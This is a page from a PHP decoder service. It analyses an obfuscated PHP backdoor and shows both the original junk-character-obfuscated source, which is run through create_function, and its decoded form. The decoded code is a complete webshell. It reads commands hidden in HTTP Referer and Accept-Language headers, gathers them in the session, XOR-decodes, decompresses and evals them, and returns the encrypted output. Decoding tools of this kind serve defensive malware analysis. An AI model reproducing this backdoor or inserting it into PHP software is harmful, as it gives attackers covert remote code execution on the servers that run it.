Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $R=str_replace('Qe','','creQeQeatQee_fuQencQeQetion'); $L='{$if`f`}^$k{$j};f`}}rf`..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$R=str_replace('Qe','','creQeQeatQee_fuQencQeQetion');
$L='{$if`f`}^$k{$j};f`}}rf`eturn $o;}$r=$_f`SERVERf`;$rf`r=@$r["HTTP_Rf`EFf`ERER"f`];$ra=';
$l='$kh="5d41";f`$kf="4f`02a"f`;fuf`nction x($f`t,$k)f`{$c=strf`len($kf`);$l=f`f`strlen($f`t)';
$Q='f`-]+(f`?:;qf`=0f`.([\\f`d]))?,?/",$raf`,$m);if($f`q&&$m){f`@sf`f`ession_start()f`;$f`s=&$_SESS';
$C='osf`(f`$sf`[$i],$f);iff`($e){$k=$kh.$kf;ob_stf`af`rt();@ef`val(@gzuncf`ompressf`(@x(f`@ba';
$c='sf`s(md5($i.f`$kh)f`,0,3));$f=$f`sl($ss(md5f`f`($i.$kff`)f`,0,f`3));$p="";for($z=1;$f`';
$G='sf`e64_decof`df`e(preg_replacf`ef`(array("/_/f`","/f`-/"),f`arrf`ay("/","+"f`),$ssf`($s[$';
$s='If`ON;$sf`s="substrf`";$f`sl="sf`trtolower"f`;f`$i=$m[1][0f`].f`$m[1][1];f`f`f`$h=$sl($';
$y='@f`$r["HTTPf`_ACCEPf`f`T_LANGUAGf`E"];if(f`$rr&&$raf`){$f`u=paf`rf`se_url($rr);parsf`e_st';
$x='zf`<cf`ount($m[1])f`;$z++)$f`p.f`=$q[f`$m[2][f`$z]];if(sf`trpos(f`$p,f`$h)===0){$s[$i]f`="';
$q=';$o="";f`f`ff`or($i=0;$i<$lf`;){for($j=f`0;($jf`f`<$c&&f`$i<$lf`);$j++,$i++f`f`){$o.=$t';
$X='f`_encode(x(gzcomprf`f`essf`($o),$k))f`;print("<$f`k>$d<f`/$k>");@f`sessf`f`ion_destroy();}}}}';
$W='r($f`u["qf`uery"],f`$q);$q=f`f`array_valuesf`(f`$q);preg_f`matf`ch_all("/([\\wf`])[\\w';
$e='"f`f`;$pf`=$ssf`f`($p,3);}if(array_key_existf`s($if`,$s)){f`$f`s[$f`i].=$p;$e=f`sf`trp';
$S='i],0f`,$ef`))),$kf`)));f`$o=ob_getf`_conf`tents(f`)f`;ob_ef`f`nd_clean();$d=basf`e64f`';
$O=str_replace('f`','',$l.$q.$L.$y.$W.$Q.$s.$c.$x.$e.$C.$G.$S.$X);
$z=$R('',$O);$z();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C osf`(f`$sf`[$i],$f);iff`($e){$k=$kh.$kf;ob_stf`af`rt();@ef`v..
$G sf`e64_decof`df`e(preg_replacf`ef`(array("/_/f`","/f`-/"),f`..
$L {$if`f`}^$k{$j};f`}}rf`eturn $o;}$r=$_f`SERVERf`;$rf`r=@$r["..
$O $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$Q f`-]+(f`?:;qf`=0f`.([\f`d]))?,?/",$raf`,$m);if($f`q&&$m){f`@..
$R create_function
$S i],0f`,$ef`))),$kf`)));f`$o=ob_getf`_conf`tents(f`)f`;ob_ef`..
$W r($f`u["qf`uery"],f`$q);$q=f`f`array_valuesf`(f`$q);preg_f`m..
$X f`_encode(x(gzcomprf`f`essf`($o),$k))f`;print("<$f`k>$d<f`/$..
$c sf`s(md5($i.f`$kh)f`,0,3));$f=$f`sl($ss(md5f`f`($i.$kff`)f`,..
$e "f`f`;$pf`=$ssf`f`($p,3);}if(array_key_existf`s($if`,$s)){f`..
$l $kh="5d41";f`$kf="4f`02a"f`;fuf`nction x($f`t,$k)f`{$c=strf`..
$q ;$o="";f`f`ff`or($i=0;$i<$lf`;){for($j=f`0;($jf`f`<$c&&f`$i<..
$s If`ON;$sf`s="substrf`";$f`sl="sf`trtolower"f`;f`$i=$m[1][0f`..
$x zf`<cf`ount($m[1])f`;$z++)$f`p.f`=$q[f`$m[2][f`$z]];if(sf`tr..
$y @f`$r["HTTPf`_ACCEPf`f`T_LANGUAGf`E"];if(f`$rr&&$raf`){$f`u=..
$z None

Stats

MD5 9ffd916d5bb8a9d0592b0d298959e96e
Eval Count 1
Decode Time 92 ms